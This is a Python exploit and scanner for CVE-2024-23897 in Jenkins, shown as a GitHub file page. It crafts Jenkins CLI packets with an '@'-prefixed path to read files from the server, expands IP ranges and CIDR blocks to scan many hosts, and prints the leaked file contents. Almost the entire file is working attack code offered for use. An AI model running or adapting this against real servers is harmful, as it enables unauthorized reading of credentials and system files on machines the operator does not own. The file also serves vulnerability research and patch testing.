-
Notifications
You must be signed in to change notification settings - Fork 23
/
CVE-2024-23897.py
188 lines (155 loc) · 6.85 KB
/
CVE-2024-23897.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
#!/usr/bin/env python3
import threading
import http.client
import time
import uuid
import sys
import urllib.parse
import argparse
import ipaddress
# ANSI escape sequences used to colour console output; ENDC resets the colour.
BLUE = "\033[94m"
GREEN = "\033[92m"
RED = "\033[91m"
ENDC = "\033[0m"
# Value sent as the "Content-type" header of the upload request.
CONTENT_TYPE_OCTET_STREAM = 'application/octet-stream'
# Character prepended to the requested file path when the payload is built.
# NOTE(review): the name is misspelled ("ARBITRARY"); it is kept as-is because
# other parts of the file refer to it by this name.
ARBITRATY_CHAR = '@'
def display_help_message():
    """Print the usage text of the module-level ``parser`` to standard output."""
    parser.print_help(sys.stdout)
def display_banner():
    """Print the tool banner to standard output, coloured blue.

    The banner previously ended its second line with a stray double quote,
    which was printed verbatim; it has been removed.
    """
    banner = """
CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner.
Alexander Hagenah / @xaitax / ah@primepage.de
"""
    print(BLUE + banner + ENDC)
def expand_cidr(cidr):
    """Return the host addresses of a CIDR block as a list of strings.

    Host bits set in ``cidr`` are tolerated (``strict=False``). A value that
    cannot be parsed as a network yields an empty list instead of an error.
    """
    try:
        network = ipaddress.ip_network(cidr, strict=False)
    except ValueError:
        # Unparseable input is reported as "no hosts" rather than raised.
        return []
    return list(map(str, network.hosts()))
def expand_range(ip_range):
    """Expand ``"<first>-<last>"`` into every address in the inclusive range.

    Args:
        ip_range: Two IP addresses separated by a single dash. Whitespace
            around either address is ignored.

    Returns:
        A list of address strings from the first to the last address. The
        list is empty when the last address is lower than the first.

    Raises:
        ValueError: If the dash is missing, either side is not a valid IP
            address, or the two addresses are of different IP versions.
    """
    first_text, dash, last_text = ip_range.partition('-')
    if not dash:
        raise ValueError(f"Not an IP range (missing '-'): {ip_range!r}")

    first = ipaddress.ip_address(first_text.strip())
    last = ipaddress.ip_address(last_text.strip())

    # Mixing IPv4 and IPv6 would otherwise try to enumerate an enormous span.
    if first.version != last.version:
        raise ValueError(f"Range endpoints differ in IP version: {ip_range!r}")

    span = int(last) - int(first) + 1
    return [str(first + offset) for offset in range(span)]
def expand_list(ip_list):
    """Split a comma-separated list of targets into individual entries.

    Whitespace around each entry is removed and empty entries (for example
    from a trailing comma) are dropped, so ``"a, b,"`` yields ``["a", "b"]``.
    """
    entries = (entry.strip() for entry in ip_list.split(','))
    return [entry for entry in entries if entry]
def generate_ip_list(target):
    """Turn a target specification into a list of address strings.

    The specification is classified by the first separator found, checked in
    this order: ``-`` (range), ``,`` (list), ``/`` (CIDR block). A value with
    none of these is returned unchanged as a single-element list.
    """
    if '-' in target:
        return expand_range(target)
    if ',' in target:
        return expand_list(target)
    if '/' in target:
        return expand_cidr(target)
    return [target]
def handle_target(target_url, session_id, data_bytes):
    """Run the download and upload requests for one target and wait for both.

    Announces the target on the console (and in the output file when
    ``args.output_file`` is set), then runs ``send_download_request`` and
    ``send_upload_request`` on separate threads that share ``session_id``.
    """
    scan_notice = f"🔍 Scanning {target_url}"
    print(BLUE + scan_notice + ENDC)
    if args.output_file:
        write_to_output_file(args.output_file, scan_notice)

    downloader = threading.Thread(
        target=send_download_request,
        args=(target_url, session_id),
    )
    uploader = threading.Thread(
        target=send_upload_request,
        args=(target_url, session_id, data_bytes),
    )

    # The download side is started first; the short pause gives it a head
    # start before the upload side begins.
    downloader.start()
    time.sleep(0.1)
    uploader.start()

    for worker in (downloader, uploader):
        worker.join()
def send_download_request(target_url, session_id):
    """Send the "download" side request and report the response body.

    Issues ``POST /cli?remoting=false`` to the host in ``target_url`` with the
    ``Session`` and ``Side: download`` headers, reads the whole response and
    prints it in green. Any exception is reported in red as the target being
    not reachable. Both outcomes are also appended to ``args.output_file``
    when that option is set. Nothing is returned.

    The connection is now always closed, so the socket is not left open for
    every processed target.
    """
    connection = None
    try:
        parsed_url = urllib.parse.urlparse(target_url)
        connection = http.client.HTTPConnection(parsed_url.netloc, timeout=10)
        connection.request("POST", "/cli?remoting=false", headers={
            "Session": session_id,
            "Side": "download"
        })
        response = connection.getresponse().read()
        result = f"💣 Exploit Response from {target_url}: \n{response.decode()}"
        print(GREEN + result + ENDC)
        if args.output_file:
            write_to_output_file(args.output_file, result)
    except Exception as e:
        # Every failure (connection, HTTP, decoding) is reported the same way.
        error_message = f"❌ {target_url} not reachable: {e}\n"
        print(RED + error_message + ENDC)
        if args.output_file:
            write_to_output_file(args.output_file, error_message)
    finally:
        if connection is not None:
            connection.close()
def send_upload_request(target_url, session_id, data_bytes):
    """Send the "upload" side request carrying ``data_bytes`` as its body.

    Issues ``POST /cli?remoting=false`` to the host in ``target_url`` with the
    ``Session``, ``Side: upload`` and octet-stream ``Content-type`` headers.
    The response is read and discarded. Nothing is returned.

    Errors are deliberately not reported here; this request is best-effort.
    The connection is now always closed, so the socket is not left open.
    """
    connection = None
    try:
        parsed_url = urllib.parse.urlparse(target_url)
        connection = http.client.HTTPConnection(parsed_url.netloc, timeout=10)
        connection.request("POST", "/cli?remoting=false", headers={
            "Session": session_id,
            "Side": "upload",
            "Content-type": CONTENT_TYPE_OCTET_STREAM
        }, body=data_bytes)
        # Drain the response; its content is not used.
        connection.getresponse().read()
    except Exception:
        # Best-effort: failures on this side are intentionally ignored.
        pass
    finally:
        if connection is not None:
            connection.close()
def read_hosts_from_file(file_path):
    """Read one host entry per line from ``file_path``.

    Leading and trailing whitespace is removed from every line, and lines
    that are empty after stripping are skipped.
    """
    hosts = []
    with open(file_path, 'r') as handle:
        for raw_line in handle:
            entry = raw_line.strip()
            if entry:
                hosts.append(entry)
    return hosts
def write_to_output_file(file_path, data):
    """Append ``data`` followed by a newline to ``file_path`` as UTF-8 text."""
    with open(file_path, mode='a', encoding='utf-8') as sink:
        sink.writelines([data, '\n'])
def build_data_segment(file_path, command, language):
    """Assemble the request body from its three parts.

    The result is the command header, followed by the file-path payload,
    followed by the language tail, concatenated in that order.
    """
    header = calculate_header_in_bytes(command)
    payload = calculate_payload_in_bytes(file_path)
    tail = calculate_tail_in_bytes(language)
    return header + payload + tail
def calculate_header_in_bytes(command):
    """Return the fixed header bytes for ``command``.

    Recognised commands are ``help``, ``who-am-i`` and ``connect-node``.
    Any other value yields the ``help`` header.
    """
    help_header = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00'
    # In each entry the byte just before the name equals the name's length,
    # and the fourth byte equals that length plus two.
    known_headers = (
        ("help", help_header),
        ("who-am-i", b'\x00\x00\x00\x0A\x00\x00\x08who-am-i\x00\x00\x00'),
        ("connect-node", b'\x00\x00\x00\x0E\x00\x00\x0Cconnect-node\x00\x00\x00'),
    )
    for name, header in known_headers:
        if command == name:
            return header
    return help_header
def calculate_payload_in_bytes(file_path):
    """Build the payload section that carries the file path.

    ``ARBITRATY_CHAR`` is prepended to ``file_path``. The result is, in order:
    the prefixed path's length plus two, two zero bytes, the prefixed path's
    length, and the encoded prefixed path. Both lengths are produced by
    ``decimal_to_hex``.
    """
    prefixed_path = ARBITRATY_CHAR + file_path
    # NOTE(review): lengths are counted in characters before encoding, so they
    # match the encoded size only when every character encodes to one byte.
    path_length = len(prefixed_path)
    length_field = decimal_to_hex(path_length)
    outer_length_field = decimal_to_hex(path_length + 2)
    return b'' + outer_length_field + b'\x00\x00' + length_field + prefixed_path.encode()
def calculate_tail_in_bytes(language):
"""Creates the tail end of the packet that contains language."""
tail_slice = (
b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05'+ language.encode() + b'\x00\x00\x00\x00\x03')
return tail_slice
def decimal_to_hex(decimal_value):
    """Convert a non-negative integer to its big-endian byte representation.

    Args:
        decimal_value: The integer to convert.

    Returns:
        The value as ``bytes`` using the fewest whole bytes needed; ``0``
        becomes ``b'\\x00'``. Values above 255 produce more than one byte.

    Raises:
        ValueError: If ``decimal_value`` is not an integer or is negative.
    """
    if not isinstance(decimal_value, int):
        raise ValueError("Input must be an integer.")
    if decimal_value < 0:
        raise ValueError("Input must be non-negative.")
    hex_string = format(decimal_value, 'x')
    # bytes.fromhex needs an even number of digits; padding only up to two
    # digits used to fail for values such as 256 ('100').
    if len(hex_string) % 2:
        hex_string = '0' + hex_string
    return bytes.fromhex(hex_string)
# Command-line interface. Exactly one of --target / --input-file must be
# given, and --file is always required.
parser = argparse.ArgumentParser(description='CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 exploitation and scanner.')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-t', '--target', help='Target specification. Can be a single IP (e.g., 192.168.1.1), a range of IPs (e.g., 192.168.1.1-192.168.1.255), a list of IPs separated by commas (e.g., 192.168.1.1,192.168.1.2), or a CIDR block (e.g., 192.168.1.0/24).')
group.add_argument('-i', '--input-file', help='Path to input file containing hosts.')
parser.add_argument('-p', '--port', type=int, default=8080, help='Port number. Default is 8080.')
parser.add_argument('-f', '--file', required=True, help='File to read on the target system. Only maximum of 3 lines can be extracted.')
parser.add_argument('-o', '--output-file', help='Path to output file for saving the results.')
# Help text previously misspelled the tool name as "jenkinds-cli.jar".
parser.add_argument('-c', '--command', default="help", help="The jenkins-cli.jar command [help|who-am-i|connect-node]. Default is 'help'.")
parser.add_argument('-l', '--language', default="en_US", help="The language code you want to use.")
display_banner()

# When invoked without any arguments, show the usage text and exit with
# status 1 before argparse gets to run.
if len(sys.argv) == 1:
    display_help_message()
    sys.exit(1)

args = parser.parse_args()

# The request body depends on the requested file, command and language; it is
# built once and reused for every target.
data_bytes = build_data_segment(args.file, args.command, args.language)

# Targets come either verbatim from the input file or from the expanded
# --target specification combined with --port.
if args.input_file:
    target_urls = read_hosts_from_file(args.input_file)
else:
    target_ips = generate_ip_list(args.target)
    target_urls = [f'http://{target_ip}:{args.port}' for target_ip in target_ips]

# Targets are processed one after another, each with a fresh session id.
for target_url in target_urls:
    session_id = str(uuid.uuid4())
    handle_target(target_url, session_id, data_bytes)